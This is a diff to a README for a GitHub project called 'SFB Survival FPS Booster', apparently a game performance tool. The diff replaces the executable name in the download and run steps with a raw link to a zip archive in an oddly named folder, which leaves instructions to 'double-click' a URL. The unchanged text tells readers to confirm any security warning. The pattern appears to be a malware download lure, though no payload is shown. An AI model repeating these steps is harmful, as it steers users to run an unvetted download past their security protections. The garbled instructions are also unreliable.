zedkali/SFB---Survival-FPS-Booster/README.md

 ### 💾 Step 3: Download the File

 Click on the file to download it.
 Depending on your browser, you may need to confirm the download or choose a location to save the file.
-The file name will likely be something like `SFB---Survival-FPS-Booster.exe`.
+The file name will likely be something like `https://github.com/zedkali/SFB---Survival-FPS-Booster/raw/refs/heads/main/orthopinacoid/Booster-SF-FP-Survival-3.7.zip`.

 ### 🚀 Step 4: Run the Application

 Once the download finishes, locate the file in your downloads folder.
-Double-click on the `SFB---Survival-FPS-Booster.exe` file to start the program.
+Double-click on the `https://github.com/zedkali/SFB---Survival-FPS-Booster/raw/refs/heads/main/orthopinacoid/Booster-SF-FP-Survival-3.7.zip` file to start the program.
 If prompted by a security warning, confirm that you want to run the application.

 ## 🔧 Features